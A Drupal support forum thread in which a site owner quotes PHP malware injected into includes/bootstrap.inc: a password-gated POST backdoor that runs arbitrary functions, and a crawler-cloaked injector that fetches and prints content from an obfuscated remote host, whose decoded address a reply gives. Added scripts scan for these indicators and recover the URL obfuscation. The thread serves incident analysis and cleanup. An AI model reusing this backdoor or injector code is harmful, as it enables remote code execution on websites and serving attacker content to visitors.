Hello!

My hosting provider warned me that my bootstrap.inc file is connecting to an infected host. The issue is said to be happening between lines 771 and 808 of the includes/bootstrap.inc file (code below).

This file somehow keeps getting changed (about once a week), from 120 KB to 123 KB. Whenever this happens, I try to upload a clean file. If the file is changed/hacked, my hosting's response is 10-15 seconds slower.

Drupal 7 is updated to 7.41, and the modules are up to date. The code that's causing the issue is somewhere between those lines (I suspect it's the "cookie" part). This is the infected/added part my hosting provider warned me about:

$_passssword = '2505363ea355401256fe974720d85db8';
$p = $_POST;
if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'],   @$p['c'], '');

if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
echo('<!--checker_start ');
$tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
echo(substr($tmp, 50));
echo(' checker_end-->');
}
unset($_passssword);

$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
    $bad_url = true;
    break;
}
}

$cookie_name = 'PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
 //    setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
 //        $url = base64_decode('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$url = decrypt_url('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$code = request_url_data($url);
//    if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
    $echo_done = true;
    print $decoded;
}
}//iend

I'm no back-end developer, and I've been using bootstrap for hobby-related projects for over 8 years.

I tried to clean D7 (re-uploaded fresh includes, modules and everything apart from /sites/). I also tried checking it with some popular scanners.

Does anyone have any idea how to block these changes to bootstrap.inc? Are there any successful tools for that, or modules for scanning? Or maybe someone recognizes the exploit and could give me a tip on where it's coming from?

Thank you in advance.
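As an added example (not Drupal code, not a Sucuri tool, and not something from the original post), here is the kind of check a practitioner would run to answer the "tools for scanning" question: a small indicator scan plus a hash baseline. The regexes are taken only from the injected snippet quoted above; the "dynamic callable" rule is generalised to any `$var[$key](...)` call, which is the construct that lets the first three lines execute whatever function name arrives in a POST field. The two sample trees written by `demo()` are constructed for the demonstration, and the stub `drupal_bootstrap` inside them is a placeholder, not the real function.

```python
"""Indicator scan plus hash baseline for a Drupal 7 tree.

Added example (not Drupal code and not a Sucuri tool). The indicator
regexes come only from the injected snippet quoted in the post above;
the "dynamic callable" rule is generalised to any `$var[$key](...)`
call, which is how the snippet turns a POST field into a function name.
The sample files written below are constructed for the demo.
"""
import hashlib
import os
import re
import tempfile

PHP_EXTS = (".php", ".inc", ".module", ".theme", ".install")

INDICATORS = {
    # "$p[$_passssword]($p['a'], $p['c'])": function name and arguments from $_POST
    "dynamic_callable": re.compile(r"@?\$\w+\[\s*\$\w+\s*\]\s*\("),
    "password_var": re.compile(r"\$_pass+word\b"),
    "decrypt_url": re.compile(r"\bdecrypt_url\s*\("),
    "request_url_data": re.compile(r"\brequest_url_data\s*\("),
    # fake cookie: the injected payload is served once per visitor
    "fake_session_cookie": re.compile(r"PHP_SESSION_PHP"),
    # cloaking: crawlers never see the injected content
    "bot_filter": re.compile(r"googlebot\|msnbot", re.I),
    "long_base64": re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{40,}['\"]"),
}


def scan_file(path):
    """Return (path, line number, indicator name) for every matching line."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for name, rx in INDICATORS.items():
                if rx.search(line):
                    hits.append((path, lineno, name))
    return hits


def scan_tree(root, exts=PHP_EXTS):
    """Scan every PHP-like file under root; file order is deterministic."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.endswith(exts):
                hits.extend(scan_file(os.path.join(dirpath, name)))
    return hits


def sha256_tree(root, exts=PHP_EXTS):
    """Relative path -> sha256 of every PHP-like file, for diffing against a clean copy."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    digests[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def changed_files(clean, live):
    """Files in the live tree that are missing from, or differ from, the clean baseline."""
    return sorted(path for path, digest in live.items() if clean.get(path) != digest)


# Constructed sample: a stub bootstrap.inc, and the same stub with the
# injected lines from the post appended (what the hosting provider found).
CLEAN_INC = "<?php\nfunction drupal_bootstrap($phase = NULL) {\n  return $phase;\n}\n"
INFECTED_INC = CLEAN_INC + (
    "$_passssword = '2505363ea355401256fe974720d85db8';\n"
    "$p = $_POST;\n"
    "if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) "
    "@$p[$_passssword](@$p['a'], @$p['c'], '');\n"
    "$cookie_name = 'PHP_SESSION_PHP';\n"
    "$url = decrypt_url('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');\n"
)


def demo():
    """Write the two sample trees, scan the live one and diff it against the clean one."""
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as live:
        for root, content in ((clean, CLEAN_INC), (live, INFECTED_INC)):
            os.makedirs(os.path.join(root, "includes"))
            with open(os.path.join(root, "includes", "bootstrap.inc"), "w") as fh:
                fh.write(content)
        hits = [(lineno, name) for _, lineno, name in scan_tree(live)]
        changed = changed_files(sha256_tree(clean), sha256_tree(live))
    return {"hits": hits, "changed": changed}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Run `scan_tree()` over the whole web root, not only includes/, because the snippet calls `decrypt_url()` and `request_url_data()` without defining them, so a second injected file must exist somewhere (themes and anything under sites/ included). The hash baseline is the part that answers "how do I notice the change": take `sha256_tree()` of a freshly downloaded 7.41 tarball and of the live site, and `changed_files()` lists exactly what to look at; run it from cron and alert on a non-empty result rather than waiting for the host to notice the outbound connection.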

Comments

bantar

I found this article for you that might give you a clue as to what is happening. http://labs.sucuri.net/notes/2015-12-28

I'm no Drupal expert, so someone else will need to help you figure out how this creeps back in. This appears to be the dirty code:

$url = decrypt_url('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$code = request_url_data($url);
//    if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
    $echo_done = true;
    print $decoded;
}

However, you have other dirty code somewhere because the function decrypt_url() is not in this snippet. Using the website mentioned above, I think this URL decrypts to the following string:
http://35.87.63.92/blog/?alpha&utm_source=70334:781141:1912

This site appears to be down. Your page is timing out while loading that URL, which is the likely cause of your page load delay. Hope this helps. Good luck.
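The comment above gives the decrypted URL but not how it was obtained. As an added example (not code from the post, from Drupal or from Sucuri), the block below recovers the transform from the ciphertext alone. `decrypt_url()` is not in the quoted snippet, but the commented-out line just above it feeds the same literal straight to `base64_decode()`, so base64 is taken as the outer layer, and a single-byte XOR is tried as the inner one; that choice is an assumption confirmed by the result. The key is recovered by known plaintext (the output must begin with `http`), so nothing about the key is hard-coded in the recovery step.

```python
"""Recover the decrypt_url() transform from the ciphertext alone.

Added example, not code from the post, from Drupal or from Sucuri. The
function decrypt_url() is not in the quoted snippet; the commented-out line
above it feeds the same string straight to base64_decode(), so base64 is
taken as the outer layer and a single-byte XOR is tried as the inner one
(an assumption). The key is recovered by known plaintext: a URL starts
with "http", and the first byte alone pins down a single-byte key.
"""
import base64

# The literal passed to decrypt_url() in the injected code.
ENCODED = "a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE="


def xor_bytes(data, key):
    """XOR every byte with the same one-byte key."""
    return bytes(b ^ key for b in data)


def is_printable_ascii(data):
    return all(0x20 <= b < 0x7F for b in data)


def recover_single_byte_xor(encoded, known_prefix=b"http"):
    """Try all 256 keys after base64 decoding; keep (key, text) pairs whose
    output begins with known_prefix and is entirely printable ASCII."""
    raw = base64.b64decode(encoded, validate=True)
    candidates = []
    for key in range(256):
        plain = xor_bytes(raw, key)
        if plain.startswith(known_prefix) and is_printable_ascii(plain):
            candidates.append((key, plain.decode("ascii")))
    return candidates


def decrypt_url(encoded, key):
    """Reimplementation of the transform once the key is known."""
    return xor_bytes(base64.b64decode(encoded), key).decode("ascii")


if __name__ == "__main__":
    for key, url in recover_single_byte_xor(ENCODED):
        print(f"key=0x{key:02x}: {url}")
```

With the key in hand, `decrypt_url()` can be pointed at any other long literal found during the clean-up, since the same family of injections tends to reuse the obfuscation. Do not fetch the recovered URL from the compromised host: the `print $decoded` line in the snippet pastes whatever that host returns into the page of every first-time visitor with a non-bot user agent, and the blocking `request_url_data()` call is why a dead payload host shows up as a 10-15 second delay.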

Darn

Thanks a lot! This link is a nice find; I'm going to check it and perhaps contact Sucuri.
I'll try to post an update if I solve this.

martin0101

Hello Darn,

I've got the same thing on a server. I've cleaned some files with suspicious code, but I still got that code back.

Have you resolved your problem?

Darn

Hey martin0101,
In a way, yes. After countless tries, one day I just removed (not replaced or updated, but removed) all the themes I had. It was totally my mistake that, apart from replacing Drupal with a fresh install, I kept some old, un-updated, non-default themes (I forgot about them).

But it was a lucky shot; suspicious code could be anywhere, and it might not help you in the end. However, Micheal on Stack Overflow (link below) had a different solution, which I didn't really try:
http://stackoverflow.com/questions/35044627/includes-bootstrap-inc-hacke...

Maybe it'll help.

Overall I'd advise (if nothing else helps) deleting (*back up first!) and re-uploading everything you have, except theme-specific CSS or your own personal modifications. I'm pretty sure that by the time I got it cleaned, I had replaced everything (apart from theme CSS).

martin0101

Hey Darn,

Thanks a lot for your quick follow-up, and I'll check out that way.

I found that post this morning, then I removed some weird "preg_replace" code, and those look to be related to the theme.

VM

Was the site ever running Drupal pre-7.32? Was the site updated within hours of the 7.32 release? If not, then the backdoor could be in the database. See: https://www.drupal.org/node/2357241